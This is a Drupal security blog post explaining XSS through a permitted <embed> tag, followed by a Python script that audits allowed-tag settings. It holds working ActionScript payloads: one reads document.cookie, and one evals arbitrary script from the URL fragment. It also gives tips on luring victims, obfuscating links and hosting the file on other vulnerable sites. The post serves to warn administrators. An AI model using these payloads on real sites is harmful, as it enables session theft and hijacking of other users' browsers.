Input Format
Using <embed> for XSS
Heine — Fri, 30/10/2009 - 18:38
I see far fewer stray <script> tags in the "Allowed HTML tags:" list of the HTML filter these days. The <embed> tag, however, is something I still see a lot in misconfigured formats.
It's rather easy to exploit such formats to execute JavaScript with a little ActionScript:
{
    static function main(){
        // a javascript: URL passed to getURL runs in the page that embeds the swf
        getURL('javascript:alert(document.cookie)');
    }
}
Build with an ActionScript 2 compiler (e.g. the Flex SDK), upload to a convenient location *), then make a post on the site that was so careless as to allow the <embed> tag:
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>
Now all you have to do is lead the victim to this URL:
If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:
{
    static function main(){
        // evaluates whatever follows the # in the URL the victim was sent to
        getURL('javascript:eval(document.location.hash.substr(1))');
    }
}
The victim now has to visit (use a URL shortener for maximum obfuscation):
That's it, folks. Moral of the story: don't allow the <embed> tag in the HTML filter. If you need to embed videos, use one of the modules that insert videos from trusted sources and prevent script interaction.
*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:
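The moral above as a check you can run: an added example, not code from the post or from Drupal, that parses a Drupal-style "Allowed HTML tags" string, flags tags that permit active content, and shows a whitelist filter dropping an <embed> from a comment. The tag list beyond <script> and <embed>, the sample settings and the sample comment are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Tags that let a poster load or run active content. <script> and <embed> are the two the
# post names; the others are assumed additions from the same family.
ACTIVE_CONTENT_TAGS = {"script", "embed", "object", "applet", "iframe"}

# Constructed sample settings: SAFE_FORMAT mirrors a typical default "Allowed HTML tags"
# list, RISKY_FORMAT is the misconfiguration the post describes.
SAFE_FORMAT = "<a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>"
RISKY_FORMAT = "<a> <em> <strong> <embed>"

# Constructed sample of a spam comment carrying an embed; the src is a placeholder.
SAMPLE_POST = ("Excellent article, it's pleasure to read your blog "
               '<a href="http://example.com/fxxgg">FOREX</a>'
               '<embed src="http://example.com/PLACEHOLDER.swf" width="1" height="1">')

def parse_allowed_tags(allowed: str) -> set:
    """Parse Drupal's 'Allowed HTML tags' setting, a whitespace-separated list like '<a> <em>'."""
    return {t.lower() for t in re.findall(r"<\s*([A-Za-z][A-Za-z0-9]*)\s*>", allowed)}

def audit_allowed_tags(allowed: str) -> set:
    """Return the allowed tags that permit active content (non-empty means a misconfigured format)."""
    return parse_allowed_tags(allowed) & ACTIVE_CONTENT_TAGS

class _Whitelist(HTMLParser):
    """Rebuild markup keeping only whitelisted tags; disallowed tags vanish, their text stays."""
    def __init__(self, allowed):
        super().__init__()  # convert_charrefs=True: entities arrive decoded in handle_data
        self.allowed, self.out = allowed, []
    def handle_starttag(self, tag, attrs):
        if tag in self.allowed:
            # Attribute values are re-escaped; filtering dangerous attribute values
            # (e.g. javascript: in href) is a separate job this example does not do.
            attr_text = "".join(f' {k}="{html.escape(v, quote=True)}"' for k, v in attrs if v is not None)
            self.out.append(f"<{tag}{attr_text}>")
    def handle_endtag(self, tag):
        if tag in self.allowed:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def strip_disallowed(markup: str, allowed: set) -> str:
    """Filter a post the way a whitelist HTML filter would, given the parsed allowed-tag set."""
    parser = _Whitelist(allowed)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

Run audit_allowed_tags over each input format's setting; any non-empty result is a format that needs fixing before untrusted users may post with it.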
Input formats - the quickest way to make your site insecure
Heine — Sun, 30/12/2007 - 23:15
In a desperate attempt to balance my karma at the end of the year, a small public service post about the most popular way to make your site insecure. This is aimed at website administrators and developers. There will be no code (promise).